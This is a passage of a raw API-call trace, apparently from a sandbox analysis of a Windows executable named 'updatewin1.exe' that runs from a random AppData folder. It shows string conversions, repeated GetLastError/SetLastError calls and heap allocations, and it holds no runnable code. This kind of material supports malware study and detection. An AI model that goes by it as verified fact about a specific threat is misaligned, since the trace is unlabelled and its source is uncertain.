\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÿ\x1d\x16¹\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0080.046] GetLastError () returned 0x0 [0080.046] SetLastError (dwErrCode=0x0) [0080.046] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0080.046] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쁻먫㞕AĀ") returned 256 [0080.046] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쁻먫㞕AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0080.046] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쁻먫㞕AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0080.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÿ\x1d\x16¹\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0080.046] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x43a580, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe")) returned 0x5f [0080.046] GetLastError () returned 0x0 [0080.047] SetLastError (dwErrCode=0x0) [0080.047] GetLastError () returned 0x0 [0080.047] SetLastError (dwErrCode=0x0) [0080.047] GetLastError () returned 0x0 [0080.047] SetLastError (dwErrCode=0x0) [0080.047] GetLastError () returned 0x0 [0080.047] SetLastError (dwErrCode=0x0) [0080.047] GetLastError () returned 0x0 [0080.047] SetLastError (dwErrCode=0x0) [0080.047] GetLastError () returned 0x0 [0080.047] SetLastError (dwErrCode=0x0) [0080.048] GetLastError () returned 0x0 [0080.048] SetLastError (dwErrCode=0x0) [0080.048] GetLastError () returned 0x0 [0080.048] SetLastError (dwErrCode=0x0) [0080.048] GetLastError () returned 0x0 [0080.048] SetLastError (dwErrCode=0x0) [0080.048] GetLastError () returned 0x0 [0080.048] SetLastError (dwErrCode=0x0) [0080.048] GetLastError () returned 0x0 [0080.049] SetLastError (dwErrCode=0x0) [0080.049] GetLastError () returned 0x0 [0080.049] SetLastError (dwErrCode=0x0) [0080.049] GetLastError () returned 0x0 [0080.049] SetLastError (dwErrCode=0x0) [0080.049] GetLastError () returned 0x0 [0080.049] SetLastError (dwErrCode=0x0) [0080.049] GetLastError () returned 0x0 [0080.049] SetLastError (dwErrCode=0x0) [0080.049] GetLastError () returned 0x0 [0080.049] SetLastError (dwErrCode=0x0) [0080.050] GetLastError () returned 0x0 [0080.050] SetLastError (dwErrCode=0x0) [0080.050] GetLastError () returned 0x0 [0080.050] SetLastError (dwErrCode=0x0) [0080.050] GetLastError () returned 0x0 [0080.050] SetLastError (dwErrCode=0x0) [0080.050] GetLastError () returned 0x0 [0080.050] SetLastError (dwErrCode=0x0) [0080.050] GetLastError () returned 0x0 [0080.051] SetLastError (dwErrCode=0x0) [0080.051] GetLastError () returned 0x0 [0080.051] SetLastError (dwErrCode=0x0) [0080.051] GetLastError () returned 0x0 [0080.051] SetLastError (dwErrCode=0x0) [0080.051] GetLastError () returned 0x0 [0080.051] SetLastError (dwErrCode=0x0) [0080.051] GetLastError () returned 0x0 [0080.051] SetLastError (dwErrCode=0x0) [0080.052] GetLastError () returned 0x0 [0080.052] SetLastError (dwErrCode=0x0) [0080.052] GetLastError () returned 0x0 [0080.052] SetLastError (dwErrCode=0x0) [0080.052] GetLastError () returned 0x0 [0080.052] SetLastError (dwErrCode=0x0) [0080.052] GetLastError () returned 0x0 [0080.052] SetLastError (dwErrCode=0x0) [0080.052] GetLastError () returned 0x0 [0080.052] SetLastError (dwErrCode=0x0) [0080.052] GetLastError () returned 0x0 [0080.053] SetLastError (dwErrCode=0x0) [0080.053] GetLastError () returned 0x0 [0080.053] SetLastError (dwErrCode=0x0) [0080.053] GetLastError () returned 0x0 [0080.053] SetLastError (dwErrCode=0x0) [0080.053] GetLastError () returned 0x0 [0080.053] SetLastError (dwErrCode=0x0) [0080.053] GetLastError () returned 0x0 [0080.053] SetLastError (dwErrCode=0x0) [0080.053] GetLastError () returned 0x0 [0080.053] SetLastError (dwErrCode=0x0) [0080.053] GetLastError () returned 0x0 [0080.053] SetLastError (dwErrCode=0x0) [0080.053] GetLastError () returned 0x0 [0080.054] SetLastError (dwErrCode=0x0) [0080.054] GetLastError () returned 0x0 [0080.054] SetLastError (dwErrCode=0x0) [0080.054] GetLastError () returned 0x0 [0080.054] SetLastError (dwErrCode=0x0) [0080.054] GetLastError () returned 0x0 [0080.054] SetLastError (dwErrCode=0x0) [0080.054] GetLastError () returned 0x0 [0080.054] SetLastError (dwErrCode=0x0) [0080.054] GetLastError () returned 0x0 [0080.054] SetLastError (dwErrCode=0x0) [0080.054] GetLastError () returned 0x0 [0080.055] SetLastError (dwErrCode=0x0) [0080.055] GetLastError () returned 0x0 [0080.055] SetLastError (dwErrCode=0x0) [0080.055] GetLastError () returned 0x0 [0080.055] SetLastError (dwErrCode=0x0) [0080.055] GetLastError () returned 0x0 [0080.055] SetLastError (dwErrCode=0x0) [0080.055] GetLastError () returned 0x0 [0080.056] SetLastError (dwErrCode=0x0) [0080.056] GetLastError () returned 0x0 [0080.056] SetLastError (dwErrCode=0x0) [0080.056] GetLastError () returned 0x0 [0080.056] SetLastError (dwErrCode=0x0) [0080.056] GetLastError () returned 0x0 [0080.056] SetLastError (dwErrCode=0x0) [0080.056] GetLastError () returned 0x0 [0080.057] SetLastError (dwErrCode=0x0) [0080.057] GetLastError () returned 0x0 [0080.057] SetLastError (dwErrCode=0x0) [0080.057] GetLastError () returned 0x0 [0080.057] SetLastError (dwErrCode=0x0) [0080.057] GetLastError () returned 0x0 [0080.057] SetLastError (dwErrCode=0x0) [0080.057] GetLastError () returned 0x0 [0080.057] SetLastError (dwErrCode=0x0) [0080.057] GetLastError () returned 0x0 [0080.058] SetLastError (dwErrCode=0x0) [0080.058] GetLastError () returned 0x0 [0080.058] SetLastError (dwErrCode=0x0) [0080.058] GetLastError () returned 0x0 [0080.058] SetLastError (dwErrCode=0x0) [0080.058] GetLastError () returned 0x0 [0080.058] SetLastError (dwErrCode=0x0) [0080.059] GetLastError () returned 0x0 [0080.059] SetLastError (dwErrCode=0x0) [0080.059] GetLastError () returned 0x0 [0080.059] SetLastError (dwErrCode=0x0) [0080.059] GetLastError () returned 0x0 [0080.059] SetLastError (dwErrCode=0x0) [0080.059] GetLastError () returned 0x0 [0080.059] SetLastError (dwErrCode=0x0) [0080.059] GetLastError () returned 0x0 [0080.060] SetLastError (dwErrCode=0x0) [0080.060] GetLastError () returned 0x0 [0080.060] SetLastError (dwErrCode=0x0) [0080.060] GetLastError () returned 0x0 [0080.060] SetLastError (dwErrCode=0x0) [0080.060] GetLastError () returned 0x0 [0080.060] SetLastError (dwErrCode=0x0) [0080.060] GetLastError () returned 0x0 [0080.061] SetLastError (dwErrCode=0x0) [0080.061] GetLastError () returned 0x0 [0080.061] SetLastError (dwErrCode=0x0) [0080.061] GetLastError () returned 0x0 [0080.061] SetLastError (dwErrCode=0x0) [0080.061] GetLastError () returned 0x0 [0080.061] SetLastError (dwErrCode=0x0) [0080.061] GetLastError () returned 0x0 [0080.061] SetLastError (dwErrCode=0x0) [0080.061] GetLastError () returned 0x0 [0080.061] SetLastError (dwErrCode=0x0) [0080.061] GetLastError () returned 0x0 [0080.062] SetLastError (dwErrCode=0x0) [0080.062] GetLastError () returned 0x0 [0080.062] SetLastError (dwErrCode=0x0) [0080.062] GetLastError () returned 0x0 [0080.062] SetLastError (dwErrCode=0x0) [0080.062] GetLastError () returned 0x0 [0080.062] SetLastError (dwErrCode=0x0) [0080.062] GetLastError () returned 0x0 [0080.062] SetLastError (dwErrCode=0x0) [0080.062] GetLastError () returned 0x0 [0080.062] SetLastError (dwErrCode=0x0) [0080.062] GetLastError () returned 0x0 [0080.062] SetLastError (dwErrCode=0x0) [0080.062] GetLastError () returned 0x0 [0080.062] SetLastError (dwErrCode=0x0) [0080.063] GetLastError () returned 0x0 [0080.063] SetLastError (dwErrCode=0x0) [0080.063] GetLastError () returned 0x0 [0080.063] SetLastError (dwErrCode=0x0) [0080.063] GetLastError () returned 0x0 [0080.063] SetLastError (dwErrCode=0x0) [0080.063] GetLastError () returned 0x0 [0080.063] SetLastError (dwErrCode=0x0) [0080.063] GetLastError () returned 0x0 [0080.063] SetLastError (dwErrCode=0x0) [0080.063] GetLastError () returned 0x0 [0080.063] SetLastError (dwErrCode=0x0) [0080.063] GetLastError () returned 0x0 [0080.063] SetLastError (dwErrCode=0x0) [0080.063] GetLastError () returned 0x0 [0080.064] SetLastError (dwErrCode=0x0) [0080.064] GetLastError () returned 0x0 [0080.064] SetLastError (dwErrCode=0x0) [0080.064] GetLastError () returned 0x0 [0080.064] SetLastError (dwErrCode=0x0) [0080.064] GetLastError () returned 0x0 [0080.064] SetLastError (dwErrCode=0x0) [0080.064] GetLastError () returned 0x0 [0080.064] SetLastError (dwErrCode=0x0) [0080.064] GetLastError () returned 0x0 [0080.064] SetLastError (dwErrCode=0x0) [0080.064] GetLastError () returned 0x0 [0080.064] SetLastError (dwErrCode=0x0) [0080.065] GetLastError () returned 0x0 [0080.065] SetLastError (dwErrCode=0x0) [0080.065] GetLastError () returned 0x0 [0080.065] SetLastError (dwErrCode=0x0) [0080.065] GetLastError () returned 0x0 [0080.168] SetLastError (dwErrCode=0x0) [0080.168] GetLastError () returned 0x0 [0080.168] SetLastError (dwErrCode=0x0) [0080.168] GetLastError () returned 0x0 [0080.168] SetLastError (dwErrCode=0x0) [0080.168] GetLastError () returned 0x0 [0080.168] SetLastError (dwErrCode=0x0) [0080.168] GetLastError () returned 0x0 [0080.168] SetLastError (dwErrCode=0x0) [0080.168] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x74) returned 0x2f1990 [0080.168] GetLastError () returned 0x0 [0080.168] SetLastError (dwErrCode=0x0) [0080.168] GetLastError () returned 0x0 [0080.169] SetLastError (dwErrCode=0x0) [0080.169] GetLastError () returned 0x0 [0080.169] SetLastError (dwErrCode=0x0) [0080.169] GetLastError () returned 0x0 [0080.169] SetLastError (dwErrCode=0x0) [0080.169] GetLastError () returned 0x0 [0080.169] SetLastError (dwErrCode=0x0) [0080.169] GetLastError () returned 0x0 [0080.169] SetLastError (dwErrCode=0x0) [0080.169] GetLastError () returned 0x0 [0080.169] SetLastError (dwErrCode=0x0) [0080.169] GetLastError () returned 0x0 [0080.170] SetLastError (dwErrCode=0x0) [0080.170] GetLastError () returned 0x0 [0080.170] SetLastError (dwErrCode=0x0) [0080.170] GetLastError () returned 0x0 [0080.170] SetLastError (dwErrCode=0x0) [0080.170] GetLastError () returned 0x0 [0080.170] SetLastError (dwErrCode=0x0) [0080.170] GetLastError () returned 0x0 [0080.170] SetLastError (dwErrCode=0x0) [0080.170] GetLastError () returned 0x0 [0080.170] SetLastError (dwErrCode=0x0) [0080.170] GetLastError () returned 0x0 [0080.170] SetLastError (dwErrCode=0x0) [0080.170] GetLastError () returned 0x0 [0080.171] SetLastError (dwErrCode=0x0) [0080.171] GetLastError () returned 0x0 [0080.171] SetLastError (dwErrCode=0x0) [0080.171] GetLastError () returned 0x0 [0080.171] SetLastError (dwErrCode=0x0) [0080.171] GetLastError () returned 0x0 [0080.171] SetLastError (dwErrCode=0x0) [0080.171] GetLastError () returned 0x0 [0080.171] SetLastError (dwErrCode=0x0) [0080.171] GetLastError () returned 0x0 [0080.171] SetLastError (dwErrCode=0x0) [0080.171] GetLastError () returned 0x0 [0080.171] SetLastError (dwErrCode=0x0) [0080.171] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.172] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.172] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.172] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.172] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.172] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.172] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.172] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.172] GetLastError () returned 0x0 [0080.172] SetLastError (dwErrCode=0x0) [0080.173] GetLastError () returned 0x0 [0080.173] SetLastError (dwErrCode=0x0) [0080.173] GetLastError () returned 0x0 [0080.173] SetLastError (dwErrCode=0x0) [0080.173] GetLastError () returned 0x0 [0080.173] SetLastError (dwErrCode=0x0) [0080.173] GetLastError () returned 0x0 [0080.173] SetLastError (dwErrCode=0x0) [0080.173] GetLastError () returned 0x0 [0080.173] SetLastError (dwErrCode=0x0) [0080.173] GetLastError () returned 0x0 [0080.173] SetLastError (dwErrCode=0x0) [0080.173] GetLastError () returned 0x0 [0080.173] SetLastError (dwErrCode=0x0) [0080.174] GetLastError () returned 0x0 [0080.174] SetLastError (dwErrCode=0x0) [0080.174] GetLastError () returned 0x0 [0080.174] SetLastError (dwErrCode=0x0) [0080.174] GetLastError () returned 0x0 [0080.174] SetLastError (dwErrCode=0x0) [0080.174] GetLastError () returned 0x0 [0080.174] SetLastError (dwErrCode=0x0) [0080.174] GetLastError () returned 0x0 [0080.174] SetLastError (dwErrCode=0x0) [0080.174] GetLastError () returned 0x0 [0080.174] SetLastError (dwErrCode=0x0) [0080.174] GetLastError () returned 0x0 [0080.174] SetLastError (dwErrCode=0x0) [0080.174] GetLastError () returned 0x0 [0080.175] SetLastError (dwErrCode=0x0) [0080.175] GetLastError () returned 0x0 [0080.175] SetLastError (dwErrCode=0x0) [0080.175] GetLastError () returned 0x0 [0080.175] SetLastError (dwErrCode=0x0) [0080.175] GetLastError () returned 0x0 [0080.175] SetLastError (dwErrCode=0x0) [0080.175] GetLastError () returned 0x0 [0080.175] SetLastError (dwErrCode=0x0) [0080.175] GetLastError () returned 0x0 [0080.175] SetLastError (dwErrCode=0x0) [0080.175] GetLastError () returned 0x0 [0080.175] SetLastError (dwErrCode=0x0) [0080.175] GetLastError () returned 0x0 [0080.176] SetLastError (dwErrCode=0x0) [0080.176] GetLastError () returned 0x0 [0080.176] SetLastError (dwErrCode=0x0) [0080.176] GetLastError () returned 0x0 [0080.176] SetLastError (dwErrCode=0x0) [0080.176] GetLastError () returned 0x0 [0080.176] SetLastError (dwErrCode=0x0) [0080.176] GetLastError () returned 0x0 [0080.176] SetLastError (dwErrCode=0x0) [0080.176] GetLastError () returned 0x0 [0080.176] SetLastError (dwErrCode=0x0) [0080.176] GetLastError () returned 0x0 [0080.176] SetLastError (dwErrCode=0x0) [0080.177] GetLastError () returned 0x0 [0080.177] SetLastError (dwErrCode=0x0) [0080.177] GetLastError () returned 0x0 [0080.177] SetLastError (dwErrCode=0x0) [0080.177] GetLastError () returned 0x0 [0080.177] SetLastError (dwErrCode=0x0) [0080.177] GetLastError () returned 0x0 [0080.177] SetLastError (dwErrCode=0x0) [0080.177] GetLastError () returned 0x0 [0080.177] SetLastError (dwErrCode=0x0) [0080.177] GetLastError () returned 0x0 [0080.177] SetLastError (dwErrCode=0x0) [0080.177] GetLastError () returned 0x0 [0080.177] SetLastError (dwErrCode=0x0) [0080.177] GetLastError () returned 0x0 [0080.177] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.178] SetLastError (dwErrCode=0x0) [0080.178] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.179] SetLastError (dwErrCode=0x0) [0080.179] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.180] GetLastError () returned 0x0 [0080.180] SetLastError (dwErrCode=0x0) [0080.181] GetLastError () returned 0x0 [0080.181] SetLastError (dwErrCode=0x0) [0080.181] GetLastError () returned 0x0 [0080.181] SetLastError (dwErrCode=0x0) [0080.181] GetLastError () returned 0x0 [0080.181] SetLastError (dwErrCode=0x0) [0080.181] GetLastError () returned 0x0 [0080.181] SetLastError (dwErrCode=0x0) [0080.181] GetLastError () returned 0x0 [0080.181] SetLastError (dwErrCode=0x0) [0080.181] GetLastError () returned 0x0 [0080.181] SetLastError (dwErrCode=0x0) [0080.181] GetLastError () returned 0x0 [0080.181] SetLastError (dwErrCode=0x0) [0080.181] GetLastError () returned 0x0 [0080.181] SetLastError (dwErrCode=0x0) [0080.181] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x98) returned 0x2f1a10 [0080.181] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1f) returned 0x2f1ab0 [0080.181] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x36) returned 0x2f1ad8 [0080.181] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x37) returned 0x2f1b18 [0080.181] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x3c) returned 0x2f1b58 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x31) returned 0x2f1ba0 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x17) returned 0x2f1be0 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x24) returned 0x2f1c00 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x14) returned 0x2f1c30 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xd) returned 0x2f1c50 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x25) returned 0x2f1c68 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x39) returned 0x2f1c98 [0080.182] RtlAllocateHeap (HeapHandle=0x2f0000, 